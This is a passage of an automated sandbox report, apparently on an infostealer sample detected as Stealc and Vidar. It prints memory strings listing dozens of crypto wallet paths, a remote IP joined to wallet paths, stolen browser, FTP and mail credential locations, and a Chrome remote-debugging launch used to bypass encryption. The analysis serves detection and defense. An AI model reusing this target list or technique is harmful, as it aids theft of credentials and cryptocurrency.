Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16er\AppData\Roaming\\Coinomi\Coinomi\wallets\\.
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16er\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Documents\JJECFIECBG.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Source: Yara match	File source: 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2758733046.000000000108C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2758733046.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2185073918.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7368, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB50C40 sqlite3_bind_zeroblob,	1_2_6CB50C40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB50D60 sqlite3_bind_parameter_name,	1_2_6CB50D60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA78EA0 sqlite3_clear_bindings,	1_2_6CA78EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB50B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6CB50B40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA76410 bind,WSAGetLastError,	1_2_6CA76410
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA760B0 listen,WSAGetLastError,	1_2_6CA760B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA7C030 sqlite3_bind_parameter_count,	1_2_6CA7C030
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA76070 PR_Listen,	1_2_6CA76070
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA7C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	1_2_6CA7C050
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA022D0 sqlite3_bind_blob,	1_2_6CA022D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA763C0 PR_Bind,	1_2_6CA763C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
